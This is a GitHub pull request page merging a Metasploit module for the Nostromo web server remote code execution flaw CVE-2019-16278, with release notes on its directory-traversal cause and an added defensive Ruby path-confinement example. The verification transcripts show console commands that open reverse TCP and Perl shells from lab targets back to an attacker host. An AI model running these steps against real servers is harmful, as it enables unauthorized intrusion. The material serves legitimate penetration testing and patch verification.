
Exploit for CVE-2019-16278 (Nostromo RCE) #12476

Merged
merged 12 commits into from
Oct 31, 2019

Conversation

qkaiser
Contributor

@qkaiser qkaiser commented Oct 21, 2019

This is a port of sp0re's exploit for CVE-2019-16278, described in https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html

Verification

Nostromo 1.9.6 on Ubuntu Linux 18.04

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit

Nostromo 1.9.6 on OpenBSD 6.4

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf5 exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf5 exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y
[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit

@space-r7 space-r7 self-assigned this Oct 30, 2019
s/Nostrom/Nostromo/

Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@space-r7
Contributor

Tested on Nostromo v1.9.6 with Ubuntu 18.04:

msf5 > use exploit/multi/http/nostromo_code_exec 
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.37.231
rhosts => 192.168.37.231
msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.37.231:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf5 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Sending stage (3021284 bytes) to 192.168.37.231
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.231:40700) at 2019-10-30 14:29:17 -0500
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: uid=1002, gid=1002, euid=1002, egid=1002
meterpreter > sysinfo
Computer     : 192.168.37.231
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

space-r7 added a commit that referenced this pull request Oct 31, 2019
@space-r7 space-r7 merged commit 4a6c1d8 into rapid7:master Oct 31, 2019
msjenkins-r7 pushed a commit that referenced this pull request Oct 31, 2019
@space-r7
Contributor

space-r7 commented Oct 31, 2019

Release Notes

This adds an exploit module for Nostromo web server versions 1.9.6 and below. Remote code execution can be achieved because of insufficient checks on attempted directory traversal in the http_verify() function, leading to malicious, user-controlled code being passed to the execve() function.
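
The release notes describe the root cause as a request path that is not adequately checked for directory traversal before it reaches execve(). The following Ruby is an added, defensive illustration written for this page; it is not code from this pull request, from the Metasploit module, or from Nostromo. It shows the kind of document-root confinement check a server should perform on a request path: percent-decode exactly once, reject malformed escapes and control characters outright, normalize dot segments itself rather than trusting the caller's string, and confirm the resolved path still lies under the document root. DOCROOT and the sample request paths are constructed assumptions.

```ruby
# Added example: confining an HTTP request path to the document root.
# DOCROOT is a constructed assumption for this example, not Nostromo's real setting.
DOCROOT = '/var/nostromo/htdocs'.freeze

# Percent-decode a path exactly once, working on raw bytes.
# Returns nil on a malformed escape (a '%' not followed by two hex digits)
# so that nothing ambiguous gets through to the filesystem layer.
def percent_decode(path)
  bytes = path.b
  return nil if bytes =~ /%(?![0-9A-Fa-f]{2})/
  bytes.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Resolve a raw request path against the document root.
# Returns the absolute filesystem path to serve, or nil if the request must be rejected.
def resolve_request_path(raw_path, docroot = DOCROOT)
  return nil unless raw_path.is_a?(String) && raw_path.start_with?('/')

  decoded = percent_decode(raw_path)
  return nil if decoded.nil?

  # Control characters (NUL, CR, LF, TAB, DEL, ...) have no place in a filesystem
  # path; treat their presence as hostile rather than trying to strip them.
  return nil if decoded =~ /[\x00-\x1f\x7f]/

  # Normalize dot segments ourselves instead of trusting the caller's string.
  segments = []
  decoded.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      # Climbing above the root is never legitimate for a web request.
      return nil if segments.empty?
      segments.pop
    else
      segments << seg
    end
  end

  resolved = File.join(docroot, *segments)

  # Defence in depth: re-check the final string against the root boundary.
  return nil unless resolved == docroot || resolved.start_with?(docroot + '/')
  resolved
end

# Constructed sample requests: a few legitimate paths and a few that must be refused.
SAMPLE_REQUESTS = [
  '/index.html',
  '/docs/../img/logo.png',
  '/../etc/passwd',
  '/%2e%2e/%2e%2e/etc/passwd',
  '/img/%00.png',
  '/a/%zz'
].freeze

if __FILE__ == $0
  SAMPLE_REQUESTS.each do |req|
    verdict = resolve_request_path(req)
    puts format('%-28s -> %s', req, verdict ? "serve #{verdict}" : 'REJECT')
  end
end
```

The check deliberately refuses rather than sanitizes: a path with a malformed escape or a control byte is dropped instead of being repaired, because the repaired form is exactly what a server cannot reason about once it is handed to the operating system.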

@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 12, 2019